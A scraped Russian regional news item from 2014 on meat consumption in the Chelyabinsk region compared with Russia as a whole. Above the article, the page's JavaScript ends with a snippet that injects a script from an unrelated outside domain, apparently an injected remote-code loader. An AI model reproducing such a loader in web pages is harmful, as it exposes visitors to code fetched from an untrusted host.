, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Жители Южного Урала потребляют больше мяса, чем в среднем по России

Согласно исследованию, проведенному специалистами областного Министерства сельского хозяйства, в прошлом году среднестатистический житель Челябинской области съел около 111 килограмм мяса. При этом в среднем по России данный показатель равняется 75 килограммам.

В 2013 году жители региона съели 57 килограмм мяча птицы против 23 килограмм в среднем по России, 32 килограмма свинины (14 кг по России) и 22 килограмма говядины (25 по России).

Интересно, что южноуральские предприятия удовлетворяют потребность жителей в мясопродуктах только на 74%. При этом, например, мяса птицы производится на 14 процентов больше собственных потребностей, а вот свинину и говядину приходится закупать. Основными экспортерами мяса в Челябинскую область являются США, Бразилия и Аргентина.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
17:09 - 18 марта 2014
|
автор: U-RSS
|
(362)
|
(0)

Комментарии (0)

Я человек
Я бот